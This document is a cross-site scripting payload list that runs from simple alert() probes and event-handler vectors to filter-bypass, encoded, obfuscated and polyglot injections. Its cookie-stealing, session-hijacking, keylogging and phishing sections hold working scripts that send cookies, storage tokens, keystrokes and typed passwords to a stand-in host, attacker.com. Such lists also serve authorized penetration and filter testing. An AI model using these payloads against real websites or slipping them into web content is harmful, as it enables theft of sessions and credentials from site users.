# XSS Payloads

# Basic Payloads
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>

# Image-Based
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert(document.cookie)>
<img/src=x onerror=alert(1)>

# SVG-Based
<svg/onload=alert(1)>
<svg onload=alert('XSS')>
<svg><script>alert(1)</script></svg>
<svg/onload=alert(document.domain)>

# IFrame-Based
<iframe src=javascript:alert(1)>
<iframe src="javascript:alert('XSS')">
<iframe onload=alert(1)>

# Body Events
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>

# Input Events
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<input/onfocus=alert(1)/autofocus>

# Other Elements
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>

# Cookie Stealing
<script>fetch('http://attacker.com/steal?c='+document.cookie)</script>
<script>new Image().src='http://attacker.com/steal?c='+document.cookie</script>
<img src=x onerror=this.src='http://attacker.com/?c='+document.cookie>

# Session Hijacking
<script>location='http://attacker.com/?s='+sessionStorage.getItem('token')</script>
<script>fetch('http://attacker.com/log?s='+localStorage.getItem('session'))</script>

# Keylogging
<script>document.onkeypress=function(e){fetch('http://attacker.com/log?k='+e.key)}</script>
<script>document.addEventListener('keypress',e=>fetch('http://attacker.com/?k='+e.key))</script>

# Phishing
<script>var p=prompt('Session expired. Enter password:');fetch('http://attacker.com/?p='+p)</script>
<script>document.body.innerHTML='<h1>Login</h1><form action=http://attacker.com/steal><input name=user><input name=pass type=password><input type=submit></form>'</script>

# Redirection
<script>window.location='http://malicious-site.com'</script>
<script>document.location='http://evil.com'</script>
<meta http-equiv="refresh" content="0;url=http://evil.com">

# Bypassing Filters - No Script Tags
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>

# Bypassing Quote Filters
<script>alert(String.fromCharCode(88,83,83))</script>
<script>alert(/XSS/)</script>
<script>alert`1`</script>

# Bypassing Parentheses Filters
<script>alert`1`</script>
<script>onerror=alert;throw 1</script>
<script>throw onerror=alert,'1'</script>

# Encoded Payloads
&#60;script&#62;alert(1)&#60;/script&#62;
%3Cscript%3Ealert(1)%3C%2Fscript%3E
\u003cscript\u003ealert(1)\u003c/script\u003e

# Mixed Case
<ScRiPt>alert(1)</sCrIpT>
<sCrIpT>alert(1)</ScRiPt>

# DOM-Based
#<img src=x onerror=alert(1)>
#<script>alert(1)</script>

# Advanced Obfuscation
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>Function('alert(1)')()</script>
<script>[].constructor.constructor('alert(1)')()</script>

# Polyglot Payloads
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS')//>\x3e

# WAF Bypass
<svg/onload=alert(1)>
<iframe src=javas&Tab;cript:alert(1)>
<img src=x onerror=alert&#40;1&#41;>

# Event Handlers
<div onmouseover=alert(1)>hover me</div>
<a href="#" onclick=alert(1)>click</a>
<button onclick=alert(1)>click</button>
